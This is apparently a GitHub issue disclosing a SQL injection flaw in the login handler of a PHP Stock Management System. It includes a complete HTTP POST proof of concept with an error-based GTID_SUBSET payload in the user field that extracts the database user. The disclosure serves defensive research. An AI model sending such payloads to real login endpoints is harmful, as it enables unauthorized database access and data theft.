SQL injection vulnerability in Stock Management System
In processlogin PHP, in lines 7 to 9 of the code, the back-end receives the user and password parameters passed through by the front-end, and encrypts the password with sha1; In lines 18 to 25 of the code, the user and password are substituted into the database for query verification. During this process, SQL injection vulnerabilities are created without filtering
SQL injection proof
SQLMAP
BuspSuite
POC:
POST /pages/processlogin.php HTTP/1.1
Host: vulscms.test
Content-Length: 80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://vulscms.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://vulscms.test/pages/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=roq9qu2s58ta48gg165qqke6l9
Connection: close
user=1' AND GTID_SUBSET(CONCAT((SELECT USER())),5439)-- ace&password=1&btnlogin=
The text was updated successfully, but these errors were encountered:
Build environment: Apache 2.4.39; MySQL5.7.26; PHP7.3.4
SQL injection vulnerability in Stock Management System
SQL injection proof
POC:
The text was updated successfully, but these errors were encountered: